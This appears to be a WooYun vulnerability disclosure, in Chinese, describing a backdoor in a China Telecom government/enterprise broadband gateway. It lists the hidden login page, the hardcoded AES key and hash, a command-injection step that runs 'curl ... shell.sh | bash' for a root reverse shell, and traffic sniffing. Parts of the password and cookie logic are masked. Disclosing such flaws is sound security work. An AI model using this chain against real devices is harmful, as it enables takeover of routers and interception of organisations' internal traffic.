WooYun.org

电信天意宽带政企平台是电信给政府和企业做的一款设备（外包给中兴做的），其包括VPN、用户上网行为管理等功能。覆盖全上海乃至南方数个城市数万企业与政府网关设备，通过这个后门可直接获取路由器超级管理员账号密码，并取得路由器系统root权限，进而劫持企业内部流量。
长的这样：

通过各种手段拿到源码，开始审计。这款系统是用webif这款使用于openwrt平台的bash框架开发，本质上是bash脚本语言
。
简单看了一下，发现一处后门： /set/index.html。在未登录的情况下直接访问，将得到一个密码输入框：

查看当前页面表单提交位置：

查看其源码：

if empty "$FORM_password"; then
	send_header
	echo "<script>alert('${PASS_NULL}');history.back();</script>"
	exit
fi
encyp_value=$(aes 0 256 "$FORM_password")
if [ "$encyp_value" = "820ff917fff0407f6dc8d69e09c78723" ]; then
	...
	cat <<EOF
	<meta http-equiv="Refresh" content="0;url=/cgi-bin/webif/set.sh">
EOF
else
   send_header
   echo "<script>alert('${PASS_ERROR}');history.back();</script>"
fi

获取密码后，调用aes这个程序对密码进行加密后，与硬编码的字符串『820ff917fff0407f6dc8d69e09c78723』进行比较。
且不论后面怎么设置cookie的，可以先看看aes这个程序是怎么对密码进行解密的：

经过分析得知，aes第一个参数指明加密或解密，第二个参数是密钥长度，第三个参数是待加解密的字符串。
找到了密钥：

密钥就是 0x123456789abcdef03456789abcdef01256789abcdef01234789abcdef0123456。其实因为我拿到了aes这个程序，所以只需要在arm的机器上执行一下 `aes 1 256 820ff917fff0407f6dc8d69e09c78723`，即可得到答案。
后门密码是

*****fi*****

，登录之：

却提示登录超时？但观察一下可以发现，这个时候页面已经跳转到/cgi-bin/webif/set.sh了，也就是说前面的config登录成功后跳转到set.sh页面了，它在挡驾。
跟进一下：

#!/usr/bin/webif-page "-U /tmp -u 4096"
<?
. /usr/lib/webif/webif.sh
. /etc/feature
. /usr/bin/otdb.sh
selectdb="$SQLITE_CONN /usr/config/users_manage.db"

检查权限的代码在/usr/lib/webif/webif.sh，继续跟进：

*****ode*****
*****ogin*****
*****em_pas*****
*****nowt*****
*****oldt*****
**********
*****_bizbox_user*****
*****t_log*****
*****    *****
***** .*****
*****	
*****
*****
*****
**********
*****te}" != &qu*****
*****ck_l*****
*****i*****
*****cod*****

可见，这里有个check_login，检查Cookie中的bizstore_note是否正确。
那么，这个后门很明显了，首先需要设置

*****e_no*****

，才能够使用。
所以，先设置cookie，再访问/set/index.html，输入密码，成功登陆一个页面：

没见过吧，这个页面权限很高，可以直接查看超级管理员密码：

再去前台登陆之：

后台可以看到所有连接的主机（这个案例里的4台主机，有一个致远OA，一个winmail，一个SSL VPN）：

有上网行为管理：

这还不算完，如果只到这一步，肯定不行。
后台找到一处命令执行，系统管理 -> 时间设置：

可以直接写一个反弹shell的脚本，用curl下载后，管道符传给bash运行：
`curl http://**.**.**.**/shell.sh | bash`

如上图，成功获取shell，而且是root权限。
我们可以利用tcpdump抓取流经路由的流量：

影响范围。撒旦上搜索一下，可见国内暴露在公网的设备有8000+，内网当然更多。因为这个设备是上海电信给国内政企平台做的设备，所以主要影响的IP在上海：

后续分析
在第一次进入的后门页面中，我们可以看到一处名为TR069的配置：

TR069规范是一个路由管理的标准规范。也就是说，存在这个协议的路由器，会根据规范被集中管理。而这里，我们看到ACS URL（就是对路由进行集中管理的云端），实际上是电信公司的服务器）。
并且这里开启了周期上报，走在企业中的敏感信息将会被定期上报到电信的云端上，想想就可怕。
另外一个有意思的点是，上面这个后门页面中，我们是可以关闭TR069的。但实际上在正常的管理页面中，关闭按钮、周期上报按钮都是不可写的：

可见，这款路由器在设计之初，就没有给用户关闭后门的方法。